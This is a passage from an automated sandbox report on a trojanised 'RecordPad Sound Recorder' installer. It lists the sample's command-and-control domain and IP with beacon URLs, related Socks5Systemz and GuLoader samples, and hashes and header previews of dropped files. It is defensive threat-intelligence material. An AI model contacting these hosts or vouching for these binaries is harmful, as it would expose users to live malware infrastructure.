                      http://trolltech.com/xml/features/report-start-end-entity | 0% | Avira URL Cloud | safe
                      http://www.mpegla.com | 0% | Avira URL Cloud | safe
                      http://www.remobjects.com/ps | 0% | Avira URL Cloud | safe
                      http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0 | 0% | Avira URL Cloud | safe
                      http://trolltech.com/xml/features/report-whitespace-only-CharData | 0% | Avira URL Cloud | safe
                      http://ocsps.ssl.com0Q | 0% | Avira URL Cloud | safe
                      Domains
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      aaxeeeo.ru | 94.156.8.14 | true | true | | unknown
                        Contacted URLs
                        Name | Malicious | Antivirus Detection | Reputation
                        http://aaxeeeo.ru/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4fe8889b5e4fa9281ae978f371ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ff710c2e8929d3d | true | Avira URL Cloud: safe | unknown
                        aaxeeeo.ru | true | Avira URL Cloud: safe | unknown
                        http://aaxeeeo.ru/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f895a8bbc896c58e713bc90c91a36b5281fc235a925ed3e50d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ee9d9b39ca689110 | true | Avira URL Cloud: safe | unknown
                        URLs found in memory and dropped files
                        Name | Source | Malicious | Antivirus Detection | Reputation
                        http://www.innosetup.com/ | tOniaJ21lj.tmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://cert.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.cer0 | is-UCHQL.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        https://sectigo.com/CPS0 | is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | false | URL Reputation: safe | unknown
                        http://ocsp.sectigo.com0 | is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | false | URL Reputation: safe | unknown
                        http://lame.sf.net32bits64bits | is-VDBC5.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://ocsp.thawte.com0 | is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | false | URL Reputation: safe | unknown
                        http://qt-project.org/xml/features/report-whitespace-only-CharData | is-KI2RB.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://xml.org/sax/features/namespaces | is-KI2RB.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://ocsps.ssl.com0? | is-UCHQL.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://www.ssl.com/repository/SSLcomRootCertificationAuthorityRSA.crt0 | is-UCHQL.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://xml.org/sax/features/namespaceshttp://xml.org/sax/features/namespace-prefixeshttp://trolltech | is-KI2RB.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d | recordpadsoundrecorder32.exe, 00000004.00000002.3269409364.000000000095F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        http://cert.ssl.com/SSL.com-timeStamping-I-RSA-R1.cer0Q | is-UCHQL.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://lame.sf.netB | is-VDBC5.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://ocsps.ssl.com0 | is-UCHQL.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s | is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://xml.org/sax/features/namespace-prefixes | is-KI2RB.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0# | is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://qtav.org2 | is-8ECK7.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://94.156.8.14/search/?q=67e28dd83d0ea62c110ba8177c27d78406abdd88be4b12eab517aa5c96bd86e995874f8 | recordpadsoundrecorder32.exe, 00000004.00000002.3269409364.0000000000969000.00000004.00000020.00020000.00000000.sdmp, recordpadsoundrecorder32.exe, 00000004.00000002.3270365274.0000000003351000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        https://curl.haxx.se/docs/http-cookies.html | is-UTKLG.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t | is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://crls.ssl.com/ssl.com-rsa-RootCA.crl0 | is-UCHQL.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://www.remobjects.com/psU | tOniaJ21lj.exe, 00000000.00000003.2018211873.0000000002098000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017811455.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://crls.ssl.com/SSL.com-timeStamping-I-RSA-R1.crl0 | is-UCHQL.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://lame.sf.net | is-VDBC5.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://crl.thawte.com/ThawteTimestampingCA.crl0 | is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        https://www.thawte.com/cps0/ | is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0# | is-6P98M.tmp.1.dr, is-8ECK7.tmp.1.dr, is-PRP4U.tmp.1.dr, is-VDBC5.tmp.1.dr, is-JNDNQ.tmp.1.dr, is-UTKLG.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        https://www.thawte.com/repository0W | is-KI2RB.tmp.1.dr, is-RV2D1.tmp.1.dr, is-KU10K.tmp.1.dr, is-0C056.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://qt-project.org/xml/features/report-start-end-entity | is-KI2RB.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        https://curl.haxx.se/docs/copyright.htmlD | is-UTKLG.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        https://curl.haxx.se/V | is-UTKLG.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        https://www.ssl.com/repository0 | is-UCHQL.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://trolltech.com/xml/features/report-start-end-entity | is-KI2RB.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://www.mpegla.com | tOniaJ21lj.exe, 00000000.00000003.2017542262.0000000002091000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000002.3269480886.0000000002091000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017464437.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2022441507.00000000006CC000.00000004.00000020.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269794199.0000000002328000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2019413603.0000000002328000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000003.2019304134.0000000003280000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, 00000001.00000002.3269392528.00000000006AC000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                        http://www.remobjects.com/ps | tOniaJ21lj.exe, 00000000.00000003.2018211873.0000000002098000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.exe, 00000000.00000003.2017811455.0000000002310000.00000004.00001000.00020000.00000000.sdmp, tOniaJ21lj.tmp, tOniaJ21lj.tmp, 00000001.00000002.3269095275.0000000000401000.00000020.00000001.01000000.00000004.sdmp, tOniaJ21lj.tmp.0.dr, is-O2PKH.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://trolltech.com/xml/features/report-whitespace-only-CharData | is-KI2RB.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://crls.ssl.com/SSLcom-SubCA-CodeSigning-RSA-4096-R1.crl0 | is-UCHQL.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        http://ocsps.ssl.com0Q | is-UCHQL.tmp.1.dr | false | Avira URL Cloud: safe | unknown
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        Contacted IPs
                        IP | Domain | Country | ASN | ASN Name | Malicious
                        94.156.8.14 | aaxeeeo.ru | Bulgaria | 43561 | NET1-ASBG | true
                        194.59.31.219 | unknown | Germany | 30823 | COMBAHTONcombahtonGmbHDE | false
                        Joe Sandbox version:40.0.0 Tourmaline
                        Analysis ID:1455403
                        Start date and time:2024-06-11 19:41:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 6m 56s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                        Number of analysed new started processes analysed:8
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:tOniaJ21lj.exe
                        renamed because original name is a hash value
                        Original Sample Name:fa367a7d44377d2c3f684c3912fec827.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@8/49@1/2
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 93%
                        • Number of executed functions: 192
                        • Number of non-executed functions: 258
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                        • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                        • Report size getting too big, too many NtOpenKeyEx calls found.
                        • Report size getting too big, too many NtQueryValueKey calls found.
                        • VT rate limit hit for: tOniaJ21lj.exe
                        Time | Type | Description
                        13:42:30 | API Interceptor | 532473x Sleep call for process: recordpadsoundrecorder32.exe modified
                        IP context (samples previously seen contacting the same IP)
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        94.156.8.14 | awb__document__invoice__2024__04__02__000000000000004320000000000000.vbs | malicious | FormBook, GuLoader | 94.156.8.14/tJWrHmlMQNR240.bin
                        94.156.8.14 | awb_shipping_documents_bl_01_04_2024_0000000000.vbs | malicious | FormBook, GuLoader, Remcos | 94.156.8.14/gKMOUQth43.bin
                        194.59.31.219 | asaTr3exz5.exe | malicious | Socks5Systemz |
                        194.59.31.219 | SvctlJEZsa.exe | malicious | Socks5Systemz |
                        194.59.31.219 | zcpLQDujv9.exe | malicious | Socks5Systemz |
                        194.59.31.219 | DMRSGfYa44.exe | malicious | Socks5Systemz |
                        194.59.31.219 | J459EO4HX3.exe | malicious | Socks5Systemz |
                        194.59.31.219 | 6Xsre97JxM.exe | malicious | Socks5Systemz |
                        194.59.31.219 | 7grn4ITCaM.exe | malicious | Socks5Systemz |
                        194.59.31.219 | UmMgwOUPt5.exe | malicious | PureLog Stealer, RedLine, RisePro Stealer, Vidar, zgRAT |
                        194.59.31.219 | V90FqClRNT.exe | malicious | Socks5Systemz |
                        194.59.31.219 | WCvhXj4ptk.exe | malicious | Socks5Systemz |
                                            No context
                        ASN context (samples previously seen contacting the same ASN)
                        Match | Associated Sample Name / URL | Detection | Threat Name | Context
                        COMBAHTONcombahtonGmbHDE | asaTr3exz5.exe | malicious | Socks5Systemz | 194.59.31.219
                        COMBAHTONcombahtonGmbHDE | SvctlJEZsa.exe | malicious | Socks5Systemz | 194.59.31.219
                        COMBAHTONcombahtonGmbHDE | zcpLQDujv9.exe | malicious | Socks5Systemz | 194.59.31.219
                        COMBAHTONcombahtonGmbHDE | DMRSGfYa44.exe | malicious | Socks5Systemz | 194.59.31.219
                        COMBAHTONcombahtonGmbHDE | J459EO4HX3.exe | malicious | Socks5Systemz | 194.59.31.219
                        COMBAHTONcombahtonGmbHDE | 6Xsre97JxM.exe | malicious | Socks5Systemz | 194.59.31.219
                        COMBAHTONcombahtonGmbHDE | 7grn4ITCaM.exe | malicious | Socks5Systemz | 194.59.31.219
                        COMBAHTONcombahtonGmbHDE | nerbianrat.bin | malicious | Unknown | 45.153.240.73
                        COMBAHTONcombahtonGmbHDE | SKGHM_PE_757583588358839538539599593BeoersKnucklehead.vbs | malicious | Remcos, GuLoader | 194.59.31.187
                        COMBAHTONcombahtonGmbHDE | SKGHM_PE_757583588358839538539599593BeoersKnucklehead.vbs | malicious | Remcos, GuLoader | 194.59.31.187
                        NET1-ASBG | asaTr3exz5.exe | malicious | Socks5Systemz | 94.156.8.14
                        NET1-ASBG | SvctlJEZsa.exe | malicious | Socks5Systemz | 94.156.8.14
                        NET1-ASBG | zcpLQDujv9.exe | malicious | Socks5Systemz | 94.156.8.14
                        NET1-ASBG | DMRSGfYa44.exe | malicious | Socks5Systemz | 94.156.8.14
                        NET1-ASBG | J459EO4HX3.exe | malicious | Socks5Systemz | 94.156.8.14
                        NET1-ASBG | Xwt4p7gzy1.exe | malicious | Socks5Systemz | 94.156.8.14
                        NET1-ASBG | 6Xsre97JxM.exe | malicious | Socks5Systemz | 94.156.8.14
                        NET1-ASBG | UL09QPJEEX.exe | malicious | Socks5Systemz | 94.156.8.14
                        NET1-ASBG | 91fJRSNjz3.exe | malicious | Socks5Systemz | 94.156.8.14
                        NET1-ASBG | Is2mzLKh9J.exe | malicious | Socks5Systemz | 94.156.8.14
                                            No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5Svg.dll (copy) | asaTr3exz5.exe | malicious | Socks5Systemz
    SvctlJEZsa.exe | malicious | Socks5Systemz
    zcpLQDujv9.exe | malicious | Socks5Systemz
    DMRSGfYa44.exe | malicious | Socks5Systemz
    J459EO4HX3.exe | malicious | Socks5Systemz
    Xwt4p7gzy1.exe | malicious | Socks5Systemz
    6Xsre97JxM.exe | malicious | Socks5Systemz
    UL09QPJEEX.exe | malicious | Socks5Systemz
    91fJRSNjz3.exe | malicious | Socks5Systemz
    Is2mzLKh9J.exe | malicious | Socks5Systemz
C:\Users\user\AppData\Local\RecordPad Sound Recorder\Qt5OpenGL.dll (copy) | asaTr3exz5.exe | malicious | Socks5Systemz
    SvctlJEZsa.exe | malicious | Socks5Systemz
    zcpLQDujv9.exe | malicious | Socks5Systemz
    DMRSGfYa44.exe | malicious | Socks5Systemz
    J459EO4HX3.exe | malicious | Socks5Systemz
    Xwt4p7gzy1.exe | malicious | Socks5Systemz
    6Xsre97JxM.exe | malicious | Socks5Systemz
    UL09QPJEEX.exe | malicious | Socks5Systemz
    91fJRSNjz3.exe | malicious | Socks5Systemz
    Is2mzLKh9J.exe | malicious | Socks5Systemz
                                                                                    Process:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):2963553
                                                                                    Entropy (8bit):6.7944113831776685
                                                                                    Encrypted:false
                                                                                    SSDEEP:49152:v5F8VSyAJvaA5z8wbu33Lti5WGzndHKX5HCn:v5F8bAJyez8P33LtiEGzndHKX5w
                                                                                    MD5:1F7ED6F21708581170C4BF77C64A9D32
                                                                                    SHA1:B954FBF7C8A8523B7F2C101E6A7B1D852D1DBF7C
                                                                                    SHA-256:180FCC0CB50242D15ECF0DDD438C14E04A6A7B464BF0636E79620DB497A08DF7
                                                                                    SHA-512:2F62E6B4668E122C5768438E96062DFEE16E13829967F592C92DF93240908B4A09C84BBF96B6F5FBBEC2445E13FE828A0149887673A2C66E4812D0184FB9E28B
                                                                                    Malicious:true
                                                                                    Yara Hits:
                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\UID Finder 6.11.66\UID Finder 6.11.66.exe, Author: Joe Security
                                                                                    Antivirus:
                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                                    Reputation:low
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......^..........&...............................@..........................`-.........................................................@............................................................................................................text............................... ..`.bhead8.n*.......0..................@..@.data...xT...0...@...0..............@....rsrc................p..............@..@.chead8.........a...................a.f.........................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):8
                                                                                    Entropy (8bit):2.0
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:Fn:F
                                                                                    MD5:A1FCD28904D8B49B586C1CDD652FEB3D
                                                                                    SHA1:51256834CCEF8458ABD4878AF3EB40C6036A06DE
                                                                                    SHA-256:58497FEA76EE8F4C0806E365BA6E49014E85CC7845C6A6DF3F25F2F17F6E3F4A
                                                                                    SHA-512:620948F4A16BB2AC06BA93EC850279EFA286F8028F30CF8D7573659EB4F7AD19C5C2E4D0FD8263BABD75649D97D69DC6FCF65EA4E76E8DAE423E0DB584EED992
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:..hf....
                                                                                    Process:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    File Type:data
                                                                                    Category:dropped
                                                                                    Size (bytes):4
                                                                                    Entropy (8bit):0.8112781244591328
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:lln:/
                                                                                    MD5:D0166393D140EC8994FEAB673CA2F793
                                                                                    SHA1:77FC5B8A80DAC27B46CE1B582135759BCC616474
                                                                                    SHA-256:6FEA016A651B6460FDD05E8073E5114413E814D86781E4DC4E8C3592DC851128
                                                                                    SHA-512:5BD13315AEAE9AC7FF1E52BADEE5D449F6A1AD0D61E555D994A97F4D56C97D0D4BE4F2CB4A1C186E34BBDFBA40B427CE466C5FFBBEA005F6EA7B4D3D9DBA3A61
                                                                                    Malicious:false
                                                                                    Reputation:low
                                                                                    Preview:8...
                                                                                    Process:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):128
                                                                                    Entropy (8bit):2.9545817380615236
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:SmwW3Fde9UUDrjStGs/:Smze7DPStGM
                                                                                    MD5:98DDA7FC0B3E548B68DE836D333D1539
                                                                                    SHA1:D0CB784FA2BBD3BDE2BA4400211C3B613638F1C6
                                                                                    SHA-256:870555CDCBA1F066D893554731AE99A21AE776D41BCB680CBD6510CB9F420E3D
                                                                                    SHA-512:E79BD8C2E0426DBEBA8AC2350DA66DC0413F79860611A05210905506FEF8B80A60BB7E76546B0CE9C6E6BC9DDD4BC66FF4C438548F26187EAAF6278F769B3AC1
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:30ea4c433b26b5bea4193c311bc4a25098960f3df7dbf2a6175bf7d152ea71ca................................................................
                                                                                    Process:C:\Users\user\AppData\Local\RecordPad Sound Recorder\recordpadsoundrecorder32.exe
                                                                                    File Type:ASCII text, with no line terminators
                                                                                    Category:dropped
                                                                                    Size (bytes):128
                                                                                    Entropy (8bit):1.2701231977328944
                                                                                    Encrypted:false
                                                                                    SSDEEP:3:WAmJuXDz8/:HHzc
                                                                                    MD5:0D6174E4525CFDED5DD1C9440B9DC1E7
                                                                                    SHA1:173EF30A035CE666278904625EADCFAE09233A47
                                                                                    SHA-256:458677CDF0E1A4E87D32AB67D6A5EEA9E67CB3545D79A21A0624E6BB5E1087E7
                                                                                    SHA-512:86DA96385985A1BA3D67A8676A041CA563838F474DF33D82B6ECD90C101703B30747121A6B7281E025A3C11CE28ACCEDFC94DB4E8D38E391199458056C2CD27A
                                                                                    Malicious:false
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:ccddf9e705966c2f471db9..........................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):320120
                                                                                    Entropy (8bit):6.398399631689542
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:bSU6+JAfisltPzYzrIybvaEezwMckNI+STEDv4nk3ad04ZqhKTrg+COv:brAltbYzsOvaWJ
                                                                                    MD5:DB19F6E0A1BB5DB1C8D87C3FE0891136
                                                                                    SHA1:3B2DAB478A8268000EF5E4474D52CB71F9EB615E
                                                                                    SHA-256:7623B596CFD989413FEA2FE355607B029EF8E64067275CBF81863688128738B0
                                                                                    SHA-512:B328DC6D1ADE3061894BC5C50F437B732190DE3CEA6D2CDC147A9A8193EE73221937FBA24209B66226D5E4B05DFFF5A79DB8B134373D1218605BCBA6EE82A6B3
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: asaTr3exz5.exe, Detection: malicious, Browse
                                                                                    • Filename: SvctlJEZsa.exe, Detection: malicious, Browse
                                                                                    • Filename: zcpLQDujv9.exe, Detection: malicious, Browse
                                                                                    • Filename: DMRSGfYa44.exe, Detection: malicious, Browse
                                                                                    • Filename: J459EO4HX3.exe, Detection: malicious, Browse
                                                                                    • Filename: Xwt4p7gzy1.exe, Detection: malicious, Browse
                                                                                    • Filename: 6Xsre97JxM.exe, Detection: malicious, Browse
                                                                                    • Filename: UL09QPJEEX.exe, Detection: malicious, Browse
                                                                                    • Filename: 91fJRSNjz3.exe, Detection: malicious, Browse
                                                                                    • Filename: Is2mzLKh9J.exe, Detection: malicious, Browse
                                                                                    Reputation:moderate, very likely benign file
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~@hB:!..:!..:!..3Y..2!...L..8!..aI..8!...L..,!...L..2!...L..9!...O..=!..:!..."...O../!...O..;!...O..;!..:!..;!...O..;!..Rich:!..........................PE..d....lP_.........." .....\...v......$_...................................................`..........................................5...........................,......x.......|...P...T.......................(....................p..p............................text....[.......\.................. ..`.rdata..."...p...$...`..............@..@.data...8...........................@....pdata...,..........................@..@.rsrc...............................@..@.reloc..|...........................@..B........................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):331384
                                                                                    Entropy (8bit):6.387255143196498
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:cOjmvCPMfXfCsXL0hq+SNcFxkqSj1ZBtp:fcC05tp
                                                                                    MD5:C3424F2D3D26632C341EF2F542AEA36B
                                                                                    SHA1:30640EBFF046085DBA3BD0877DE8A90886BED945
                                                                                    SHA-256:FB0BD60A7D0178C62CFD14D53B40AD47E8F68DB68B95C625723CADC1CD3A1A3E
                                                                                    SHA-512:72D9A32433DA38CFB752A67C5F903F3480871FCBD16DC5999FB970313079652CF7AEB481DA6097879B641A0E76271118C6E82406DD14C9C90C7460BA6A71BDC7
                                                                                    Malicious:false
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Joe Sandbox View:
                                                                                    • Filename: asaTr3exz5.exe, Detection: malicious, Browse
                                                                                    • Filename: SvctlJEZsa.exe, Detection: malicious, Browse
                                                                                    • Filename: zcpLQDujv9.exe, Detection: malicious, Browse
                                                                                    • Filename: DMRSGfYa44.exe, Detection: malicious, Browse
                                                                                    • Filename: J459EO4HX3.exe, Detection: malicious, Browse
                                                                                    • Filename: Xwt4p7gzy1.exe, Detection: malicious, Browse
                                                                                    • Filename: 6Xsre97JxM.exe, Detection: malicious, Browse
                                                                                    • Filename: UL09QPJEEX.exe, Detection: malicious, Browse
                                                                                    • Filename: 91fJRSNjz3.exe, Detection: malicious, Browse
                                                                                    • Filename: Is2mzLKh9J.exe, Detection: malicious, Browse
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........O...........8...................................W............W.....W.....W.T.....<....W.....Rich...........................PE..d...z.P_.........." .........................................................@....../.....`..................................................*....... ...........1......x....0..8....N..T...................XP..(...PO...............................................text............................... ..`.rdata.............................@..@.data...............................@....pdata...1.......2..................@..@.rsrc........ ......................@..@.reloc..8....0......................@..B........................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):469624
                                                                                    Entropy (8bit):6.027128925039679
                                                                                    Encrypted:false
                                                                                    SSDEEP:6144:g814pr+wMrppkALmug7u7ozC/B4OvCH9UYHeAeBC:u9+wAkAS2j/B4BryC
                                                                                    MD5:820FFF478DC5F2C2D5F03A5DB9187FBC
                                                                                    SHA1:BD58AA8596345C837E1743617452EC7D73013F3A
                                                                                    SHA-256:3DC976E86D64881E0F37A54B5A04E903235E94D858889B1261527F0048CFBC03
                                                                                    SHA-512:1476919C5C133ACA519B9E9BE2684A85C7E669FA43942204ACDD9EC4A40577F966AD17D30A7EBD3A97A871E71178F0058966410A934822B96F0B2D7120AA43CB
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m>W.)_9.)_9.)_9. '../_9..28.+_9..2<.?_9..2=.!_9..2:.*_9.r7=.(_9.r78.%_9..18.,_9.)_8.._9..1<.&_9..19.(_9..1.(_9.)_..(_9..1;.(_9.Rich)_9.........PE..d...G.P_.........." .................................................................[....`.........................................0d...:...................p...K......x.......h....B..T...................8D..(...0C...............0...............................text...t........................... ..`.rdata.......0....... ..............@..@.data..............................@....pdata...K...p...L..................@..@.rsrc...............................@..@.reloc..h...........................@..B................................................................................................................................................................................................................................
                                                                                    Process:C:\Users\user\AppData\Local\Temp\is-A11IR.tmp\tOniaJ21lj.tmp
                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                    Category:dropped
                                                                                    Size (bytes):213112
                                                                                    Entropy (8bit):6.331143352918189
                                                                                    Encrypted:false
                                                                                    SSDEEP:3072:V7rtKxzN2HVkkNUq3uUw8SWrBEcsGhLec956+48G+ikgyOzk1kLrTzhvt3GyY:Vr2N253eUw81rBXVevrH+mk12rTlS
                                                                                    MD5:63D91B407A350DA5CE19B5D79924B1F4
                                                                                    SHA1:45886A4018B60A5EAB7D4B743F4DF2A9A4318EDC
                                                                                    SHA-256:22B626313A535C85CE6A097571C53A6E6678A9D4BC5D0DB9F81660ADC7ED366E
                                                                                    SHA-512:FA06AB2B1AE116BC7AE93EA64D4C258A7149A23C0171C077F0919956101A22A59DD8E3F975C64073319842F01D6183253F637A0EDB514F0C02C9D88B0E65E6CF
                                                                                    Malicious:true
                                                                                    Antivirus:
                                                                                    • Antivirus: ReversingLabs, Detection: 0%
